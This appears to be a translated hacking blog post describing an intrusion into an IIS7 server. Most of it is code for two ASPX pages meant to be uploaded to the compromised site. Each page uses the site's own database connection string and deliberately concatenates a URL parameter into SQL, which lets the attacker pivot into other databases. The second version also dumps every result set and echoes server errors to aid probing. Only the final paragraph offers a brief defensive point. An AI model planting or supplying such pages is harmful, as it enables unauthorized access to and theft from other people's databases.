Yesterday 4z1 and I looked at a site. Escalating privileges was very hard: we stared at it for a full 5 hours with no result. 2008 + IIS7, no sa, no root, none of the usual services...
Along the way we used aspx constructed injection to pivot cross-site. I found a pile of code online and not one piece of it worked.
It isn't much code, so I just wrote one myself. So annoying.
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<%@ Import Namespace="System.Configuration" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影 aspx constructed injection page</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
<script language="c#" runat="server">
    // Placeholders to fill in before uploading: "ConnectionName" is the name of the
    // connection string in the target's web.config; [Table] and Column must exist
    // in that database.
    void Page_Init(object sender, EventArgs e)
    {
        SqlConnection conn = new SqlConnection();
        // ConnectionStringSettings.ToString() returns the connection string itself.
        conn.ConnectionString = ConfigurationManager.ConnectionStrings["ConnectionName"].ToString();
        conn.Open();

        // The parameter is taken verbatim: ?xxser=1
        string i = this.Page.Request.Params["xxser"];

        // Deliberately concatenated: whatever follows xxser= becomes part of the SQL,
        // run with the site's own database login.
        SqlCommand command = new SqlCommand("select * from [Table] where Column = " + i, conn);

        // ExecuteNonQuery discards any result rows; for a SELECT it returns -1,
        // so the only feedback from this page is an error message or a rows-affected count.
        int x = command.ExecuteNonQuery();
        Response.Write(i + "\n");
        Response.Write(x);
        conn.Close();
    }
</script>
    </div>
    </form>
</body>
</html>
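An added example, not code from the original post: the same injection page, but built on SqlDataReader instead of ExecuteNonQuery. ExecuteNonQuery throws away the rows and returns -1 for a SELECT, so the page above only gives feedback through error text or a rows-affected count; this variant renders every result set (including the extra ones a stacked or UNION query produces) and echoes the server's own error message when the query fails. "ConnectionName", [Table] and Column are assumed placeholders to be filled from the target's web.config and schema; the xxser parameter and the deliberate string concatenation are kept exactly as in the original.

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<%@ Import Namespace="System.Configuration" %>
<script runat="server">
    // Added example, not the original post's code. "ConnectionName", [Table] and
    // Column are placeholders: fill them from the target's web.config and schema.
    void Page_Load(object sender, EventArgs e)
    {
        Response.ContentType = "text/plain";
        string i = Request.Params["xxser"];
        if (string.IsNullOrEmpty(i))
        {
            Response.Write("usage: ?xxser=1");
            return;
        }

        // Same deliberate concatenation as the page above: the tail of xxser is raw SQL.
        string sql = "select * from [Table] where Column = " + i;
        string cs = ConfigurationManager.ConnectionStrings["ConnectionName"].ConnectionString;

        using (SqlConnection conn = new SqlConnection(cs))
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            conn.Open();
            try
            {
                using (SqlDataReader r = cmd.ExecuteReader())
                {
                    // Walk every result set so stacked or UNION queries are fully rendered.
                    int set = 0;
                    do
                    {
                        Response.Write("-- result set " + (++set) + "\n");
                        for (int c = 0; c < r.FieldCount; c++)
                            Response.Write(r.GetName(c) + (c + 1 < r.FieldCount ? "\t" : "\n"));
                        while (r.Read())
                        {
                            for (int c = 0; c < r.FieldCount; c++)
                            {
                                string v = r.IsDBNull(c) ? "NULL" : r.GetValue(c).ToString();
                                Response.Write(v + (c + 1 < r.FieldCount ? "\t" : "\n"));
                            }
                        }
                    } while (r.NextResult());
                    // -1 for a plain SELECT; the affected-row count for INSERT/UPDATE/DELETE.
                    Response.Write("rows affected: " + r.RecordsAffected + "\n");
                }
            }
            catch (SqlException ex)
            {
                // Echo the server's own error text: with customErrors switched on, the
                // framework's error page hides it and error-based probing sees nothing.
                Response.Write("SQL error " + ex.Number + ": " + ex.Message + "\n");
            }
        }
    }
</script>
```

Everything this page can reach is bounded by the login named in web.config: it reads only what that login may read, so its reach into other sites' databases depends entirely on that login holding rights beyond the site's own database. From the defender's side, that is the check that matters: a login scoped to its own database with no server-level roles turns this page into nothing more than a second query interface to data the application could already read.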